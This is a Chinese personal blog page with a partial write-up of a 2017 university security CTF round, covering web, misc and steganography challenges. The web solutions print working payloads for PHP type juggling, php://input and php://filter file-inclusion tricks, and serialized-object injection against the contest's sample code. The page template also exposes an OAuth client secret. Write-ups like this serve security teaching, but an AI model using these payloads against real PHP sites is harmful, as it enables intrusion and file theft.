<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
   
    <meta name="keywords" content="writeup" />
  
  
  
  
  <title>2017-miac2-writeup | 丶诺熙丨5am3</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="2017全国高校移动互联网应用开发创新大赛-安全赛-第二场-部分writeup。 大部分题目都是满基础的，我等渣渣也做的蛮舒服的。据说决赛会有80支队伍。第一次看这么多人的决赛，期待决赛场上有意思的事情发生。">
<meta property="og:type" content="article">
<meta property="og:title" content="2017-miac2-writeup">
<meta property="og:url" content="https://blog.5am3.com/2017/10/31/miac2-writeup/index.html">
<meta property="og:site_name" content="丶诺熙丨5am3">
<meta property="og:description" content="2017全国高校移动互联网应用开发创新大赛-安全赛-第二场-部分writeup。 大部分题目都是满基础的，我等渣渣也做的蛮舒服的。据说决赛会有80支队伍。第一次看这么多人的决赛，期待决赛场上有意思的事情发生。">
<meta property="og:locale">
<meta property="og:image" content="https://img.5am3.com/5am3/img/20191214145904.png">
<meta property="article:published_time" content="2017-10-31T07:16:41.000Z">
<meta property="article:modified_time" content="2024-12-05T02:39:41.684Z">
<meta property="article:author" content="丶诺熙">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img.5am3.com/5am3/img/20191214145904.png">
  
    <link rel="alternative" href="/atom.xml" title="丶诺熙丨5am3" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/avatar.jpg">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
  
  
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
        <script src="https://cdn.bootcdn.net/ajax/libs/require.js/2.1.6/require.min.js"></script>
        <script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <!-- <script type="text/javascript" src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script> -->
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.jpg" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder=" Search...">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/">主页</a></li>
                        
                            <li><a  href="/archives/">归档</a></li>
                        
                            <li><a  href="/tags">标签</a></li>
                        
                            <li><a  href="/categories/">分类</a></li>
                        
                            <li><a  href="/about/">关于</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="https://github.com/5am3" title="github">github</a>
                            
                                <a class="fl weibo"  target="_blank" href="https://weibo.com/5am3" title="weibo">weibo</a>
                            
                                <a class="fl rss"  target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                                <a class="fl mail"  target="_blank" href="mailto://i@5am3.com" title="mail">mail</a>
                            
                                <a class="fl zhihu"  target="_blank" href="https://www.zhihu.com/people/5am3" title="zhihu">zhihu</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/0ctf/" style="font-size: 10px;">0ctf</a> <a href="/tags/HEXO/" style="font-size: 12.5px;">HEXO</a> <a href="/tags/csp/" style="font-size: 10px;">csp</a> <a href="/tags/ctf/" style="font-size: 10px;">ctf</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/misc/" style="font-size: 12.5px;">misc</a> <a href="/tags/nodejs/" style="font-size: 10px;">nodejs</a> <a href="/tags/nonce%E7%BB%95%E8%BF%87/" style="font-size: 10px;">nonce绕过</a> <a href="/tags/web/" style="font-size: 15px;">web</a> <a href="/tags/web%E6%B8%97%E9%80%8F/" style="font-size: 10px;">web渗透</a> <a href="/tags/writeup/" style="font-size: 20px;">writeup</a> <a href="/tags/writeup-web-xss/" style="font-size: 10px;">writeup - web - xss</a> <a href="/tags/xman/" style="font-size: 12.5px;">xman</a> <a href="/tags/xss/" style="font-size: 17.5px;">xss</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" style="font-size: 10px;">漏洞挖掘</a> <a href="/tags/%E8%A2%AB%E5%8A%A8%E6%89%AB%E6%8F%8F/" style="font-size: 10px;">被动扫描</a> <a href="/tags/%E9%9D%A2%E8%AF%95/" style="font-size: 10px;">面试</a>
                    </div>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">一个热爱安全的小渣渣！</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">归档</a></li>
                
                    <li><a href="/tags">标签</a></li>
                
                    <li><a href="/categories/">分类</a></li>
                
                    <li><a href="/about/">关于</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/5am3" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="https://weibo.com/5am3" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                        <a class="mail" target="_blank" href="mailto://i@5am3.com" title="mail">mail</a>
                    
                        <a class="zhihu" target="_blank" href="https://www.zhihu.com/people/5am3" title="zhihu">zhihu</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-miac2-writeup" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2017/10/31/miac2-writeup/" class="article-date">
      <time datetime="2017-10-31T07:16:41.000Z" itemprop="datePublished">2017-10-31</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      2017-miac2-writeup
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/writeup/">writeup</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>2017全国高校移动互联网应用开发创新大赛-安全赛-第二场-部分writeup。</p>
<p>大部分题目都是满基础的，我等渣渣也做的蛮舒服的。据说决赛会有80支队伍。<br>第一次看这么多人的决赛，期待决赛场上有意思的事情发生。</p>
<span id="more"></span>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="web1-签到题（40pt）"><a href="#web1-签到题（40pt）" class="headerlink" title="web1-签到题（40pt）"></a>web1-签到题（40pt）</h3><p>审查元素，发现有maxlenth属性，修改其值，然后post一个长数据，即可得到flag。</p>
<h3 id="web2-简单的题（80pt）"><a href="#web2-简单的题（80pt）" class="headerlink" title="web2-简单的题（80pt）"></a>web2-简单的题（80pt）</h3><p>审查元素，发现有网页源代码。<br>然后直接将password以数组形式post过去。</p>
<blockquote>
<p>postdata:<code>username=admin&amp;password[]=admin</code></p>
</blockquote>
<h3 id="web3-web100-2（100pt）"><a href="#web3-web100-2（100pt）" class="headerlink" title="web3-web100-2（100pt）"></a>web3-web100-2（100pt）</h3><p>?hint即可读到源码。<br>然后设置Cookie为serialize($KEY)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$KEY=&#x27;BDCTF:www.bluedon.com&#x27;; </span><br><span class="line">echo serialize($KEY)</span><br></pre></td></tr></table></figure>
<p>flag:flag{pBXeeZdOkG1QTP1}</p>
<h3 id="web4-送大礼（100pt）"><a href="#web4-送大礼（100pt）" class="headerlink" title="web4-送大礼（100pt）"></a>web4-送大礼（100pt）</h3><p>点击链接，发现一串代码（jsfuck编码），然后console运行。<br>得到源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">extract($_GET);  </span><br><span class="line">if(isset($bdctf))  &#123;      </span><br><span class="line">$content=trim(file_get_contents($flag));</span><br><span class="line">if($bdctf==$content)&#123;</span><br><span class="line">        echo&#x27;bdctf&#123;**********&#125;&#x27;;</span><br><span class="line">&#125;   </span><br><span class="line">else    </span><br><span class="line">&#123;</span><br><span class="line">        echo&#x27;这不是蓝盾的密码啊&#x27;;    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>payload: </p>
<blockquote>
<p>getdata: <code> ?bdctf=c%3D1&amp;flag=php://input</code><br>postdata:<code> c=1</code></p>
</blockquote>
<h3 id="web5-蓝盾管理员（100pt）："><a href="#web5-蓝盾管理员（100pt）：" class="headerlink" title="web5-蓝盾管理员（100pt）："></a>web5-蓝盾管理员（100pt）：</h3><p>2014年的一道原题，利用php特性<br>payload：</p>
<blockquote>
<p>getdata：<code>?user=php://input&amp;file=php://filter/convert.base64-encode/resource=flag.php</code><br>postdata：<code>the user is bdadmin</code></p>
</blockquote>
<p>bdctf{Lfi_AnD_More}</p>
<h3 id="web6-火星撞地球1（200pt）："><a href="#web6-火星撞地球1（200pt）：" class="headerlink" title="web6-火星撞地球1（200pt）："></a>web6-火星撞地球1（200pt）：</h3><p>admin登录提示密码错误，a登录提示用户不存在。<br>经过爆破，得到admin的密码为1q2w3e4r<br>提交flag{1q2w3e4r}成功提交。</p>
<h3 id="web7-chatbot（200pt）待补充"><a href="#web7-chatbot（200pt）待补充" class="headerlink" title="web7-chatbot（200pt）待补充"></a>web7-chatbot（200pt）<strong>待补充</strong></h3><p>发现接口<br><a href="http://8eaaa8aed3818244e4f9f31669aac9e8.yogeit.com:8080/admin.php">http://8eaaa8aed3818244e4f9f31669aac9e8.yogeit.com:8080/admin.php</a><br>传入notes后会返回 notes+账号名称+notes。<br>而且账号名称会变化，你所注册的账号轮播（Cookie的Session没有变），疑似条件竞争。<br>注册时，密钥加密方式为md5(md5(md5($pass)))<br>注册时，可以在用户名处进行注入。可判断出后台为django。</p>
<h3 id="web8-密室杀人案（150pt）"><a href="#web8-密室杀人案（150pt）" class="headerlink" title="web8-密室杀人案（150pt）"></a>web8-密室杀人案（150pt）</h3><p>存在David.php<br>发现：O:4:”Ford”:1:{s:6:”Walker”;s:8:”flag.php”;}<br>然后将以上数据get形式传给侦探we….即可<br>payload：</p>
<blockquote>
<p>getdata：<code>David.php?we...=O:4:&quot;Ford&quot;:1:&#123;s:6:&quot;Walker&quot;;s:8:&quot;flag.php&quot;;</code></p>
</blockquote>
<p><em>备注：忘了侦探叫什么名字了。</em></p>
<h3 id="web9-bluedon用户（200pt）"><a href="#web9-bluedon用户（200pt）" class="headerlink" title="web9-bluedon用户（200pt）"></a>web9-bluedon用户（200pt）</h3><p>与5题相似payload，获取到class.php源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Read&#123;//f1a9.php</span><br><span class="line">    public $file;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        if(isset($this-&gt;file))&#123;</span><br><span class="line">            echo file_get_contents($this-&gt;file);    </span><br><span class="line">        &#125;</span><br><span class="line">        return &quot;恭喜get flag&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>类似第5题。只不过后边用了一个unserialize。<br>上次某某比赛的原题。<br>最后的payload：</p>
<blockquote>
<p>getdata:<code>?user=php://input&amp;file=class.php&amp;pass=O:4:&quot;Read&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;f1a9.php&quot;;&#125;</code><br>postdata:<code>the user is bluedon</code></p>
</blockquote>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="misc1-杂项全家桶（100pt）"><a href="#misc1-杂项全家桶（100pt）" class="headerlink" title="misc1-杂项全家桶（100pt）"></a>misc1-杂项全家桶（100pt）</h3><p>拿到bdctf1.png，改后缀zip，解压的music.mp3文件<br>ihdr文件头。尝试修复png文件。得到二维码，反色后扫描，得到“工井大人夫王”<br>当铺解密得到 485376<br>再使用 MP3stego 进行解密，得到 fx4qx0hj_4_cg{Wvf}，再进行栅栏，凯撒转化，得flag<br>bdctf{4_Sm4rt_b0y}</p>
<p>参考资料：<a href="http://blog.csdn.net/etf6996/article/details/70146940">http://blog.csdn.net/etf6996/article/details/70146940</a></p>
<h3 id="misc2-抓小鸡（150pt）"><a href="#misc2-抓小鸡（150pt）" class="headerlink" title="misc2-抓小鸡（150pt）"></a>misc2-抓小鸡（150pt）</h3><p>下载后，发现是一个chm文档，尝试在主机打开。被win defender拦截。<br>尝试用好压打开。发现readme.html，打开后立即被拦截，于是拖到虚拟机打开。<br>题目要求，小鸡的地址即为flag。</p>
<p><img src="https://img.5am3.com/5am3/img/20191214145904.png"></p>
<p>所以flag{23.83.243.205}</p>
<h2 id="stega"><a href="#stega" class="headerlink" title="stega"></a>stega</h2><h3 id="stega1-像素隐藏（70pt）"><a href="#stega1-像素隐藏（70pt）" class="headerlink" title="stega1-像素隐藏（70pt）"></a>stega1-像素隐藏（70pt）</h3><p>伪加密压缩包，得到png文件，修改png文件高度即可得flag<br>Bdctf{u32wg8doib1}</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2017/10/31/miac2-writeup/">2017-miac2-writeup</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2017年10月31日 - 15时16分</p>
        <p><span>最后更新:</span>2024年12月05日 - 02时39分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/10/31/miac2-writeup/" title="2017-miac2-writeup">https://blog.5am3.com/2017/10/31/miac2-writeup/</a>
            <span class="copy-path" data-clipboard-text="原文: https://blog.5am3.com/2017/10/31/miac2-writeup/　　作者: " title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2017/11/09/360-interview/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          360面试经历及心得
        
      </div>
    </a>
  
  
    <a  href="/2017/08/02/xman-2/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">【诺熙】XMAN训练营手记-2-密码</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web1-%E7%AD%BE%E5%88%B0%E9%A2%98%EF%BC%8840pt%EF%BC%89"><span class="toc-number">1.1.</span> <span class="toc-text">web1-签到题（40pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web2-%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98%EF%BC%8880pt%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">web2-简单的题（80pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web3-web100-2%EF%BC%88100pt%EF%BC%89"><span class="toc-number">1.3.</span> <span class="toc-text">web3-web100-2（100pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web4-%E9%80%81%E5%A4%A7%E7%A4%BC%EF%BC%88100pt%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">web4-送大礼（100pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web5-%E8%93%9D%E7%9B%BE%E7%AE%A1%E7%90%86%E5%91%98%EF%BC%88100pt%EF%BC%89%EF%BC%9A"><span class="toc-number">1.5.</span> <span class="toc-text">web5-蓝盾管理员（100pt）：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web6-%E7%81%AB%E6%98%9F%E6%92%9E%E5%9C%B0%E7%90%831%EF%BC%88200pt%EF%BC%89%EF%BC%9A"><span class="toc-number">1.6.</span> <span class="toc-text">web6-火星撞地球1（200pt）：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web7-chatbot%EF%BC%88200pt%EF%BC%89%E5%BE%85%E8%A1%A5%E5%85%85"><span class="toc-number">1.7.</span> <span class="toc-text">web7-chatbot（200pt）待补充</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web8-%E5%AF%86%E5%AE%A4%E6%9D%80%E4%BA%BA%E6%A1%88%EF%BC%88150pt%EF%BC%89"><span class="toc-number">1.8.</span> <span class="toc-text">web8-密室杀人案（150pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web9-bluedon%E7%94%A8%E6%88%B7%EF%BC%88200pt%EF%BC%89"><span class="toc-number">1.9.</span> <span class="toc-text">web9-bluedon用户（200pt）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#misc1-%E6%9D%82%E9%A1%B9%E5%85%A8%E5%AE%B6%E6%A1%B6%EF%BC%88100pt%EF%BC%89"><span class="toc-number">2.1.</span> <span class="toc-text">misc1-杂项全家桶（100pt）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#misc2-%E6%8A%93%E5%B0%8F%E9%B8%A1%EF%BC%88150pt%EF%BC%89"><span class="toc-number">2.2.</span> <span class="toc-text">misc2-抓小鸡（150pt）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#stega"><span class="toc-number">3.</span> <span class="toc-text">stega</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#stega1-%E5%83%8F%E7%B4%A0%E9%9A%90%E8%97%8F%EF%BC%8870pt%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">stega1-像素隐藏（70pt）</span></a></li></ol></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>




<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='https://static.5am3.com/js/baidu/share.js?v=111.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <div id="gitments" style="width: 90%; margin: 0 auto;"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>

<script>
    var gitment = new Gitment({
      id: window.location.pathname,
      owner: '5am3',
      repo: '5am3.github.io',
      oauth: {
        client_id: 'f9b6a0a70c093d4f4f91',
        client_secret: 'ddda0abc39ed79ab681585813d74b83e5e00256a',
      },
    })
    gitment.render('gitments')
</script> 
    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2017/11/09/360-interview/" title="上一篇: 360面试经历及心得">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2017/08/02/xman-2/" title="下一篇: 【诺熙】XMAN训练营手记-2-密码">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/02/11/ctf-node1/">近两次比赛遇到的node题目简析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/19/ddctf2019/">2019DDCTF  writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/12/2018HCTF-share/">2018HCTF-share</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/07/23/MysqlOnline-writeup/">MysqlOnline writeup 巅峰极客</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/07/04/GourdScan_V2/">GourdScan V2 配置安全及使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/03/0ctf-final/">2018 0CTF final h4x0rs.date</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/04/web-testing-one/">记一次简单的渗透测试</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/04/24/ddctf2018/">2018DDCTF  writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/26/qwb-xss-rpo/">强网杯-Share your mind</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/25/anheng-2-xss/">2018安恒杯二月赛-web-应该不是 XSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/08/SCodeCTF/">通过docker部署ctf题目</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/20/2017LCTF-1/">2017LCTF wanna hack him? writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/09/360-interview/">360面试经历及心得</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/31/miac2-writeup/">2017-miac2-writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/02/xman-2/">【诺熙】XMAN训练营手记-2-密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/01/xman-1/">XMAN训练营手记-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/17/hexo2/">2.初识HEXO-页面配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/17/hexo1/">1.初识HEXO-文档排版</a></li></ul>
    
    <script src="https://cdn.bootcdn.net/ajax/libs/require.js/2.1.6/require.min.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2024 丶诺熙
            </div>
            <div class="footer-right">
                <p>Power By <a href="http://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/maochunguang/black-blue" target="_blank">Themme by tommy</a></p>
            </div>
        </div>
        
            <div class="visit">
                <script src="https://s22.cnzz.com/z_stat.php?id=1267947142&web_id=1267947142" language="JavaScript"></script>
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>


    </div>
    
<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 4;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
